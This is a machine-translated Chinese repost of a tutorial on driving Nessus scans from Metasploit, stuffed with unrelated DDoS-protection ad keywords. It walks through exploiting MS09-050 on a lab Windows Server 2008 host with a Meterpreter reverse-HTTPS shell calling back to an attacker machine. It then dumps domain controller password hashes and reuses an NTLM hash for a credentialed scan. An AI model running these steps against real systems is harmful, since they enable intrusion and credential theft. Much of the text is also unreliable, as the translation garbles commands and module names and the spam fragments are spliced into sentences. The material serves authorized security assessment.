来自 防护 2021-10-14 05:04 的文章

服务器防ddos_cdn防ddos_限时优惠

服务器防ddos_cdn防ddos_限时优惠

安全工具协同工作这是描述Nessus在Backtrack5上使用的系列文章中的第三篇。之前的帖子介绍了如何在回溯5中激活Nessus,以及如何将Nmap、Hydra和Nikto与Nessus集成。在这篇文章中,我们将介绍从Metasploit启动Nessus扫描。从Nessus4开始,Tenable引入了Nessus API,它允许用户使用XMLRPC以编程方式与Nessus服务器交互。zateberg主动在Metasploit中编写模块,这些模块可以启动Nessus扫描并将结果导入Metasploit数据库。从那里,我们可以找到哪些主机容易受到攻击,利用它们,获取密码哈希,然后使用这些密码哈希来启动有证书的Nessus扫描。您可以在Nessus端口扫描引擎中阅读有关此主题的更多信息:使用Nessus进行内部查看和Web应用程序扫描。配置Nessus在Metasploit中使用Nessus所需的第一步是登录Nessus并为Metasploit创建一个用户。在本例中,我创建了一个名为"msf"的用户,密码为"metasploit"。  当我以"msf"的身份登录时,我创建了一个名为"Windows服务器扫描"的策略。该策略启用了所有插件,并且由于我想启动一个基于网络的漏洞扫描,大多数默认设置都保持不变。设置Metasploit数据库在Metasploit中要做的第一件事是配置数据库。在执行此操作之前,您需要执行一些步骤,我发现以下两篇文章很有帮助:BT5+Metasploit+PostgreSQLBT5+Metasploit+MySQL独立服务器配置数据库后,您需要启用数据库驱动程序并连接到数据库。我们在下面的示例中使用了PostgreSQL:msf>数据库驱动程序postgresqlmsf>数据库连接博士后:metasploit@127.0.0.1/metasploitmsf>nessus_连接msf:metasploit@127.0.0.1:8834可以[*]正在连接到https://127.0.0.1:8834/无国界医生[*]已验证启动Nessus扫描下一步是使用"Nessus_policy_list"命令加载Nessus模块并列出Nessus服务器上可用的扫描策略:msf>加载nessus[*]Nessus桥,适用于Nessus 4.2.x[+]键入nessus_help命令列表[*]已成功加载插件:nessusmsf攻击(ms09_050_smb2_negotiate_func_索引)>nessus_policy_列表[+]Nessus策略列表ID名称注释-- ---- ---------4内部网络扫描-3个Web应用测试-准备PCI 2审核-1外部网络扫描扫描Windows服务器1 内置策略显示为负数,用户创建的策略将相应地编号,从1开始。""Windows服务器扫描"是我们创建的策略,将用于本例。使用此策略,我们可以使用"nessus_scan_new"命令启动新的扫描:msf>nessus_scan洇new 1 win2008 msf 192.168.1.180[*]从策略号1创建扫描,称为"win2008 msf",并扫描192.168.1.180[*]扫描已开始。uid为c620db6e-bec9-5d3d-6bd8-23eb6e7e5895f53497082c9e2aa2这将启动对Nessus服务器的扫描,并使用我们的策略扫描主机192.168.1.180。您可以使用"nessus_scan_status"命令检查扫描状态:msf>nessus扫描状态[+]运行扫描扫描ID名称所有者已启动状态当前主机总数------- ---- ----- ------- ------ ------------- -----------c620db6e-bec9-5d3d-6bd8-23eb6e7e5895f53497082c9e2aa2 win2008 msf msf 2011年6月1日03:48运行0 1*剪*扫描完成后,您可以使用"nessus_report_list"命令查看生成的报告:无国界医生>尼斯苏报告表[+]Nessus报告列表ID名称状态日期-- ---- ------ ----c620db6e-bec9-5d3d-6bd8-23eb6e7e5895f53497082c9e2aa2 win2008 msf完成时间:2011年6月1日03:51*剪*现在我们已经确定了要使用的报告,我们可以使用"nessus_report_get"命令导入结果并将其存储在Metasploit数据库中:msf>nessus_report_get c620db6e-bec9-5d3d-6bd8-23eb6e7e5895f53497082c9e2aa2[*]进口c620db6e-bec9-5d3d-6bd8-23eb6e7e5895f53497082c9e2aa2[*]192.168.1.180 Microsoft Windows Server 2008 Service Pack 1完成![+]完成导入结果后,我们可以使用"db_vulns"命令查看可用漏洞:msf漏洞攻击(ms09_050_smb2_negotiate_func_index)>db vulns[*]时间:星期三6月1日08:01:06 UTC 2011 Vuln:host=192.168.1.180 port=5355 proto=udp name=链路本地多播名称解析(LLMNR)检测refs=NSS-53513[*]时间:2011年6月1日星期三08:01:06 UTC Vuln:host=192.168.1.180 port=593 proto=tcp name=Service Detection refs=NSS-22964[*]时间:6月1日星期三08:01:06 UTC 2011 Vuln:host=192.168.1.180 port=445 proto=tcp name=MS09-050:Microsoft Windows SMB2_Smb2ValidateProviderCallback()漏洞(975497)(非机密检查)refs=CVE-2009-3103,BID-36299,CWE-399,OSVDB-57799,MSFT-MS09-050,MSF Microsoft SRV2.SYS SMB协商ProcessID函数表取消引用,NSS-40887*剪*在这个特定主机的结果中,Nessus报告它缺少Microsoft安全公告MS09-050的修补程序。要查看Metaspoit是否包含针对该漏洞的攻击,请运行命令"search exploits 09-050":msf>搜索漏洞09-050匹配模块================姓名披露日期职级说明---- --------------- ---- -----------利用/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07良好的Microsoft SRV2.SYS smb协商进程ID函数表取消引用如您所见,Metasploit确实有这样一个漏洞!下一步是利用此漏洞和有效负载危害系统:msf>使用漏洞利用/windows/smb/ms09_050_smb2_协商功能索引msf漏洞攻击(ms09_050_smb2_negotiate_func_索引)>msf漏洞攻击(ms09_050_smb2_negotiate_func_索引)>set RHOST 192.168.1.180菱形=>192.168.1.180msf漏洞攻击(ms09_050_smb2_negotiate_func_index)>设置有效负载windows/meterpter/reverse_https有效负载=>windows/MeterMeter/reverse\httpsmsf exploit(ms09_050_smb2_negotiate_func_index)>利用漏洞[*]已在上启动HTTPS反向处理程序https://192.168.1.242:8443个/[*]正在连接到目标(192.168.1.180:445)。。。[*]正在发送攻击包(951字节)。。。[*]等待长达180秒的漏洞攻击触发。。。[*]192.168.1.180:54287收到/AFIgx的请求。。。[*]192.168.1.180:54287接收到目标FIgx的分段连接。。。[*]正在将目标ID FIgx修补到DLL中[*]192.168.1.180:54288已收到/BFIgx的请求。。。[*]192.168.1.180:54288接收到目标FIgx的阶段连接。。。[*]流量计会话1于2011年6月1日星期三04:15:35-0400打开(192.168.1.242:8443->192.168.1.180:54288)仪表表>成功!上面显示的命令设置要攻击的目标(RHOST)和目标系统被攻击后要回拨的主机(LHOST)。我们选择了反向连接的HTTPS MeterMeterMeterPayload,它将连接回端口8443上的Metasploit实例。下一个任务是从远程主机转储密码哈希值。我选择使用一个名为"smart_hashdump"的新模块。我选择这个模块是因为远程主机是一个activedirectory域控制器,有几千个用户帐户。smart_hashdump允许我们转储密码哈希并将其保存到文件中:meterMeter>运行post/smart_hasdump SESSION=1,GETSYSTEM=true[*]针对WIN-8BPIQBRO0CX运行模块[*]哈希值将保存到数据库(如果连接了一个数据库)。[*]哈希将以John Password文件格式保存到:[*]/root/.msf3/loot/20110601044405_默认值192.168.1.180_windows.hashes_561621.txt文件[+]此主机是域控制器![*]正在转储密码哈希。。。看看文件"/root/.msf3/loot/20110601044405\u default_192.168.1.180中的第一行_windows.hashes_561621.txt",您将看到如下内容:阿迪尼斯特:500:aad3b435b51404eeaad3b435b51404ee:33834686D2A3F2DCB675A31B773C3A8BKRBGT:这是本地管理员帐户的密码。复制第二个字段(以粗体突出显示),腾讯防御最高的DDoS,这是本地管理员用户的NTLM哈希密码。接下来,google防御ddos,ddos防御软件linux,配置一个新的Nessus策略,并使用NTLM散列作为"SMB密码":  确保将"SMB password type"字段设置为"NTLM Hash",将"SMB account"字段设置为"Administrator"。为了进行比较,安全狗能防御ddos攻击吗,使用凭据和不使用凭据扫描目标时发现的漏洞数量如下所示:具有凭据:   没有凭据:  结论很高兴看到nessusapi被用来帮助用户提高工作效率。Nessus bridge for Metasploit是一个很棒的用户社区项目,它允许Nessus与其他流行的安全工具集成。您甚至可以使用启动Nessus、运行扫描并利用可远程利用的漏洞的脚本自动执行上述过程。但是,我们确实看到,一个有证书的扫描会生成一个更全面的系统漏洞报告。它最终将成为您在安全评估过程中所要完成的任务的选择,高防cdn测试网站,大多数人都会以他们自己的方式来处理这个过程。工具书类Nessus"可利用"字段已更新如果一个漏洞掉在森林里,有人听到它被修补了吗?